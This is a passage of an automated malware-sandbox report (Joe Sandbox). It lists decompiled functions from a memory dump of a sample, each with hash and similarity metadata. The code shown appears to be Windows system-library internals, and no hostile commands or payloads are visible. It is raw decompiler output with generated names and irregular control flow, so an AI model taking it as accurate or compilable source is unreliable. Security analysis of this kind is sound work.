                                        													if(_t95 == 0) {
                                        														break;
                                        													}
                                        													_t102 = _t80;
                                        													 *(_t104 - 0x30) = _t95;
                                        													 *(_t104 - 0x24) = _t95 - 1;
                                        													asm("lock cmpxchg8b [edi]");
                                        													_t80 = _t102;
                                        													 *(_t104 - 0x28) = _t80;
                                        													 *(_t104 - 0x24) = _t95;
                                        													__eflags = _t80 - _t102;
                                        													_t99 =  *(_t104 + 8);
                                        													if(_t80 != _t102) {
                                        														continue;
                                        													} else {
                                        														__eflags = _t95 -  *(_t104 - 0x30);
                                        														if(_t95 !=  *(_t104 - 0x30)) {
                                        															continue;
                                        														} else {
                                        															__eflags = _t95;
                                        															if(_t95 != 0) {
                                        																_t74 = 0;
                                        																 *(_t104 - 0x34) = 0;
                                        																_t102 = 0;
                                        																__eflags = 0;
                                        																while(1) {
                                        																	 *(_t104 - 0x3c) = _t102;
                                        																	__eflags = _t102 - 3;
                                        																	if(_t102 >= 3) {
                                        																		break;
                                        																	}
                                        																	__eflags = _t74;
                                        																	if(_t74 != 0) {
                                        																		L49:
                                        																		_t102 =  *_t74;
                                        																		__eflags = _t102;
                                        																		if(_t102 != 0) {
                                        																			_t102 =  *(_t102 + 4);
                                        																			__eflags = _t102;
                                        																			if(_t102 != 0) {
                                        																				 *0x179b1e0(_t74, _t99);
                                        																				 *_t102();
                                        																			}
                                        																		}
                                        																		do {
                                        																			_t71 = _t99 + 8;
                                        																			 *(_t104 - 0x2c) = _t71;
                                        																			_t80 =  *_t71;
                                        																			_t95 = _t71[1];
                                        																			 *(_t104 - 0x28) = _t80;
                                        																			 *(_t104 - 0x24) = _t95;
                                        																			goto L19;
                                        																		} while (_t74 == 0);
                                        																		goto L49;
                                        																	} else {
                                        																		_t82 = 0;
                                        																		__eflags = 0;
                                        																		while(1) {
                                        																			 *(_t104 - 0x38) = _t82;
                                        																			__eflags = _t82 -  *0x17984c0;
                                        																			if(_t82 >=  *0x17984c0) {
                                        																				break;
                                        																			}
                                        																			__eflags = _t74;
                                        																			if(_t74 == 0) {
                                        																				_t77 = E01779063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                        																				__eflags = _t77;
                                        																				if(_t77 == 0) {
                                        																					_t74 = 0;
                                        																					__eflags = 0;
                                        																				} else {
                                        																					_t74 = _t77 + 0xfffffff4;
                                        																				}
                                        																				 *(_t104 - 0x34) = _t74;
                                        																				_t82 = _t82 + 1;
                                        																				continue;
                                        																			}
                                        																			break;
                                        																		}
                                        																		_t102 = _t102 + 1;
                                        																		continue;
                                        																	}
                                        																	goto L20;
                                        																}
                                        																__eflags = _t74;
                                        															}
                                        														}
                                        													}
                                        													break;
                                        												}
                                        												L20:
                                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                        												 *((char*)(_t99 + 0xe5)) = 1;
                                        												 *((char*)(_t104 - 0x1d)) = 1;
                                        												goto L21;
                                        											}
                                        										}
                                        										L21:
                                        										 *(_t104 - 4) = 0xfffffffe;
                                        										E016A922A(_t99);
                                        										_t64 = E016C7D50();
                                        										__eflags = _t64;
                                        										if(_t64 != 0) {
                                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        										} else {
                                        											_t67 = 0x7ffe0386;
                                        										}
                                        										__eflags =  *_t67;
                                        										if( *_t67 != 0) {
                                        											_t67 = E01778B58(_t99);
                                        										}
                                        										__eflags =  *((char*)(_t104 - 0x1d));
                                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                                        											__eflags = _t99 -  *0x17986c0; // 0x12407b0
                                        											if(__eflags != 0) {
                                        												__eflags = _t99 -  *0x17986b8; // 0x0
                                        												if(__eflags == 0) {
                                        													_t94 = 0x17986bc;
                                        													_t87 = 0x17986b8;
                                        													goto L27;
                                        												} else {
                                        													__eflags = _t67 | 0xffffffff;
                                        													asm("lock xadd [edi], eax");
                                        													if(__eflags == 0) {
                                        														E016A9240(_t80, _t99, _t99, _t102, __eflags);
                                        													}
                                        												}
                                        											} else {
                                        												_t94 = 0x17986c4;
                                        												_t87 = 0x17986c0;
                                        												L27:
                                        												E016D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                        											}
                                        										}
                                        									} else {
                                        										goto L13;
                                        									}
                                        								}
                                        							}
                                        						}
                                        						return E016FD130(_t80, _t99, _t102);
                                        					} else {
                                        						 *_t51 = 0x1795388;
                                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                        						 *_t84 = _t51;
                                        						 *0x179538c = _t51;
                                        						goto L6;
                                        					}
                                        				}
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c972329a266b8c540fb921555a6a1da38b4a10e46cdb290d4a077880a72781a
                                        • Instruction ID: e33eb04ed254ff37411ffbf5a046261fd0ede08a00fc97a0542dd829cb596132
                                        • Opcode Fuzzy Hash: 4c972329a266b8c540fb921555a6a1da38b4a10e46cdb290d4a077880a72781a
                                        • Instruction Fuzzy Hash: 3A01F4725012148FC3268F18DC40B11BBE9EB42368F31806FE6018B792C374DC41CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E01774015(signed int __eax, signed int __ecx) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed char _t10;
                                        				signed int _t28;
                                        
                                        				_push(__ecx);
                                        				_t28 = __ecx;
                                        				asm("lock xadd [edi+0x24], eax");
                                        				_t10 = (__eax | 0xffffffff) - 1;
                                        				if(_t10 == 0) {
                                        					_t1 = _t28 + 0x1c; // 0x1e
                                        					E016C2280(_t10, _t1);
                                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                        					E016C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17986ac);
                                        					E016AF900(0x17986d4, _t28);
                                        					E016BFFB0(0x17986ac, _t28, 0x17986ac);
                                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                        					E016BFFB0(0, _t28, _t1);
                                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                        						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                        					}
                                        					_t10 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                        				}
                                        				return _t10;
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7a38f8d550c2cf3a751e8430fcae4c60bccca52126f792006ca70beb2090ebf
                                        • Instruction ID: 3e7d7ef5883976586aa7a6bfe51b9007c59d3fd29735335b09f74f1bccf69845
                                        • Opcode Fuzzy Hash: c7a38f8d550c2cf3a751e8430fcae4c60bccca52126f792006ca70beb2090ebf
                                        • Instruction Fuzzy Hash: F2018F7220194A7FD711AB6DCD84E67F7ADFB55A60B00026DF50887A22CB24EC51CAE8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E017614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v54;
                                        				char _v60;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t21;
                                        				intOrPtr _t27;
                                        				intOrPtr _t33;
                                        				intOrPtr _t34;
                                        				signed int _t35;
                                        
                                        				_t32 = __edx;
                                        				_t27 = __ebx;
                                        				_v8 =  *0x179d360 ^ _t35;
                                        				_t33 = __edx;
                                        				_t34 = __ecx;
                                        				E016EFA60( &_v60, 0, 0x30);
                                        				_v20 = _a4;
                                        				_v16 = _a8;
                                        				_v28 = _t34;
                                        				_v24 = _t33;
                                        				_v54 = 0x1034;
                                        				if(E016C7D50() == 0) {
                                        					_t21 = 0x7ffe0388;
                                        				} else {
                                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v60);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t21 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 291e64bc143391cded64e2c3547cbbb0e4d57a3baffc9d2f6c243211549b151e
                                        • Instruction ID: b34d3347127c588133b5e22e9ef35b7a065a3eab1a570a46ed63ebba9248aaa6
                                        • Opcode Fuzzy Hash: 291e64bc143391cded64e2c3547cbbb0e4d57a3baffc9d2f6c243211549b151e
                                        • Instruction Fuzzy Hash: 08019271A01259EFCB10DFACD845EAEBBB8EF44710F40405AFD05EB280D670DA01CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E0176138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v54;
                                        				char _v60;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t21;
                                        				intOrPtr _t27;
                                        				intOrPtr _t33;
                                        				intOrPtr _t34;
                                        				signed int _t35;
                                        
                                        				_t32 = __edx;
                                        				_t27 = __ebx;
                                        				_v8 =  *0x179d360 ^ _t35;
                                        				_t33 = __edx;
                                        				_t34 = __ecx;
                                        				E016EFA60( &_v60, 0, 0x30);
                                        				_v20 = _a4;
                                        				_v16 = _a8;
                                        				_v28 = _t34;
                                        				_v24 = _t33;
                                        				_v54 = 0x1033;
                                        				if(E016C7D50() == 0) {
                                        					_t21 = 0x7ffe0388;
                                        				} else {
                                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v60);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t21 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93a3e170bf047d33580c01d52e96d262095ad334ec31269f70cf18b516a3752d
                                        • Instruction ID: a21304770e65ce175b5e5272acba89711e2c1b5bf355aee0759c04659cec6717
                                        • Opcode Fuzzy Hash: 93a3e170bf047d33580c01d52e96d262095ad334ec31269f70cf18b516a3752d
                                        • Instruction Fuzzy Hash: 89019271A01219AFCB10DFA9D845EAEBBB8EF44710F40405ABD01EB280D6709A01CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E01771074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                        				char _v8;
                                        				void* _v11;
                                        				unsigned int _v12;
                                        				void* _v15;
                                        				void* __esi;
                                        				void* __ebp;
                                        				char* _t16;
                                        				signed int* _t35;
                                        
                                        				_t22 = __ebx;
                                        				_t35 = __ecx;
                                        				_v8 = __edx;
                                        				_t13 =  !( *__ecx) + 1;
                                        				_v12 =  !( *__ecx) + 1;
                                        				if(_a4 != 0) {
                                        					E0177165E(__ebx, 0x1798ae4, (__edx -  *0x1798b04 >> 0x14) + (__edx -  *0x1798b04 >> 0x14), __edi, __ecx, (__edx -  *0x1798b04 >> 0x14) + (__edx -  *0x1798b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                        				}
                                        				E0176AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                        				if(E016C7D50() == 0) {
                                        					_t16 = 0x7ffe0388;
                                        				} else {
                                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				if( *_t16 != 0) {
                                        					_t16 = E0175FE3F(_t22, _t35, _v8, _v12);
                                        				}
                                        				return _t16;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6fbb39f4d80daf6eb07477d5a5b934d3e60c287c68a7eddb780dd3c3ef2e1b8d
                                        • Instruction ID: 176ddccdff3b07b1fd33f6185fcb6ed674ab921449782c5b5d57bf77f6e4dc53
                                        • Opcode Fuzzy Hash: 6fbb39f4d80daf6eb07477d5a5b934d3e60c287c68a7eddb780dd3c3ef2e1b8d
                                        • Instruction Fuzzy Hash: BB0147726047469FCB11EF28C844B1AFBE9FB84310F04C629F98693294EE30E945CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                        				signed char _t11;
                                        				signed char* _t12;
                                        				intOrPtr _t24;
                                        				signed short* _t25;
                                        
                                        				_t25 = __edx;
                                        				_t24 = __ecx;
                                        				_t11 = ( *[fs:0x30])[0x50];
                                        				if(_t11 != 0) {
                                        					if( *_t11 == 0) {
                                        						goto L1;
                                        					}
                                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                        					L2:
                                        					if( *_t12 != 0) {
                                        						_t12 =  *[fs:0x30];
                                        						if((_t12[0x240] & 0x00000004) == 0) {
                                        							goto L3;
                                        						}
                                        						if(E016C7D50() == 0) {
                                        							_t12 = 0x7ffe0385;
                                        						} else {
                                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                        						}
                                        						if(( *_t12 & 0x00000020) == 0) {
                                        							goto L3;
                                        						}
                                        						return E01727016(_a4, _t24, 0, 0, _t25, 0);
                                        					}
                                        					L3:
                                        					return _t12;
                                        				}
                                        				L1:
                                        				_t12 = 0x7ffe0384;
                                        				goto L2;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                        • Instruction ID: 6217bdf23a2cdd1d973a0517897338219c04c4b51014fdcef86c2b2433f90c86
                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                        • Instruction Fuzzy Hash: 2B017172200A80DFE727875CCD88FB6BBE8EB95750F0900A1EA15CB691D728DC81C725
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E0175FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				short _v58;
                                        				char _v64;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_t24 = __ebx;
                                        				_v12 =  *0x179d360 ^ _t32;
                                        				_t30 = __edx;
                                        				_t31 = __ecx;
                                        				E016EFA60( &_v64, 0, 0x30);
                                        				_v24 = _a4;
                                        				_v32 = _t31;
                                        				_v28 = _t30;
                                        				_v58 = 0x267;
                                        				if(E016C7D50() == 0) {
                                        					_t18 = 0x7ffe0388;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v64);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed6ed7bf4c8827e3cf3217cb615de244a993dd571efeec3f3652ade9c4a48652
                                        • Instruction ID: 3f01dcf30ec286f4c90fd5e840f037ea90819322caef0746fca33ec45348f14d
                                        • Opcode Fuzzy Hash: ed6ed7bf4c8827e3cf3217cb615de244a993dd571efeec3f3652ade9c4a48652
                                        • Instruction Fuzzy Hash: E5018871A01219ABDB14DFA9D845FAEB7B9EF44710F00416AFD009B281D9709901C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E0175FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				short _v58;
                                        				char _v64;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_t24 = __ebx;
                                        				_v12 =  *0x179d360 ^ _t32;
                                        				_t30 = __edx;
                                        				_t31 = __ecx;
                                        				E016EFA60( &_v64, 0, 0x30);
                                        				_v24 = _a4;
                                        				_v32 = _t31;
                                        				_v28 = _t30;
                                        				_v58 = 0x266;
                                        				if(E016C7D50() == 0) {
                                        					_t18 = 0x7ffe0388;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        				}
                                        				_push( &_v64);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8038f5ea136f6ad98cd42ed8c1f941163d1cb3436266d7aca6f0525797f90075
                                        • Instruction ID: c77b8d9c8cbf078b941d4a714e77b125d0841ce5037dbe4108f67a241a121120
                                        • Opcode Fuzzy Hash: 8038f5ea136f6ad98cd42ed8c1f941163d1cb3436266d7aca6f0525797f90075
                                        • Instruction Fuzzy Hash: 2E018471A01619ABDB14DBA9D845FAEBBB8EF44710F40416AFD01AB280DA709A01CBD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E01778A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				signed int _v12;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				short _v66;
                                        				char _v72;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed char* _t18;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_v12 =  *0x179d360 ^ _t32;
                                        				_t31 = _a8;
                                        				_t30 = _a12;
                                        				_v66 = 0x1c20;
                                        				_v40 = __ecx;
                                        				_v36 = __edx;
                                        				_v32 = _a4;
                                        				_v28 = _a8;
                                        				_v24 = _a12;
                                        				if(E016C7D50() == 0) {
                                        					_t18 = 0x7ffe0386;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v72);
                                        				_push(0x14);
                                        				_push(0x20402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E01778ED6(intOrPtr __ecx, intOrPtr __edx) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				short _v62;
                                        				char _v68;
                                        				signed char* _t29;
                                        				intOrPtr _t35;
                                        				intOrPtr _t41;
                                        				intOrPtr _t42;
                                        				signed int _t43;
                                        
                                        				_t40 = __edx;
                                        				_v8 =  *0x179d360 ^ _t43;
                                        				_v28 = __ecx;
                                        				_v62 = 0x1c2a;
                                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                        				_v24 = __edx;
                                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                        				if(E016C7D50() == 0) {
                                        					_t29 = 0x7ffe0386;
                                        				} else {
                                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v68);
                                        				_push(0x1c);
                                        				_push(0x20402);
                                        				_push( *_t29 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                        			}



















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016ADB60(signed int __ecx) {
                                        				intOrPtr* _t9;
                                        				void* _t12;
                                        				void* _t13;
                                        				intOrPtr _t14;
                                        
                                        				_t9 = __ecx;
                                        				_t14 = 0;
                                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                        					_t13 = 0xc000000d;
                                        				} else {
                                        					_t14 = E016ADB40();
                                        					if(_t14 == 0) {
                                        						_t13 = 0xc0000017;
                                        					} else {
                                        						_t13 = E016AE7B0(__ecx, _t12, _t14, 0xfff);
                                        						if(_t13 < 0) {
                                        							L016AE8B0(__ecx, _t14, 0xfff);
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                        							_t14 = 0;
                                        						} else {
                                        							_t13 = 0;
                                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                        						}
                                        					}
                                        				}
                                        				 *_t9 = _t14;
                                        				return _t13;
                                        			}








                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                        				signed char* _t13;
                                        				intOrPtr _t22;
                                        				char _t23;
                                        
                                        				_t23 = __edx;
                                        				_t22 = __ecx;
                                        				if(E016C7D50() != 0) {
                                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                        				} else {
                                        					_t13 = 0x7ffe0384;
                                        				}
                                        				if( *_t13 != 0) {
                                        					_t13 =  *[fs:0x30];
                                        					if((_t13[0x240] & 0x00000004) == 0) {
                                        						goto L3;
                                        					}
                                        					if(E016C7D50() == 0) {
                                        						_t13 = 0x7ffe0385;
                                        					} else {
                                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                        					}
                                        					if(( *_t13 & 0x00000020) == 0) {
                                        						goto L3;
                                        					}
                                        					return E01727016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                        				} else {
                                        					L3:
                                        					return _t13;
                                        				}
                                        			}







                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0173FE87(intOrPtr __ecx) {
                                        				signed int _v8;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				signed int _v24;
                                        				intOrPtr _v28;
                                        				short _v54;
                                        				char _v60;
                                        				signed char* _t21;
                                        				intOrPtr _t27;
                                        				intOrPtr _t32;
                                        				intOrPtr _t33;
                                        				intOrPtr _t34;
                                        				signed int _t35;
                                        
                                        				_v8 =  *0x179d360 ^ _t35;
                                        				_v16 = __ecx;
                                        				_v54 = 0x1722;
                                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                        				if(E016C7D50() == 0) {
                                        					_t21 = 0x7ffe0382;
                                        				} else {
                                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                        				}
                                        				_push( &_v60);
                                        				_push(0x10);
                                        				_push(0x20402);
                                        				_push( *_t21 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                        			}

















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E01778F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				short _v50;
                                        				char _v56;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
                                        
                                        				_t29 = __edx;
                                        				_v8 =  *0x179d360 ^ _t32;
                                        				_v16 = __ecx;
                                        				_v50 = 0x1c2c;
                                        				_v24 = _a4;
                                        				_v20 = _a8;
                                        				_v12 = __edx;
                                        				if(E016C7D50() == 0) {
                                        					_t18 = 0x7ffe0386;
                                        				} else {
                                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        				}
                                        				_push( &_v56);
                                        				_push(0x10);
                                        				_push(0x402);
                                        				_push( *_t18 & 0x000000ff);
                                        				return E016EB640(E016E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                        			}
















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E0176131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				short _v50;
                                        				char _v56;
                                        				signed char* _t18;
                                        				intOrPtr _t24;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				signed int _t32;
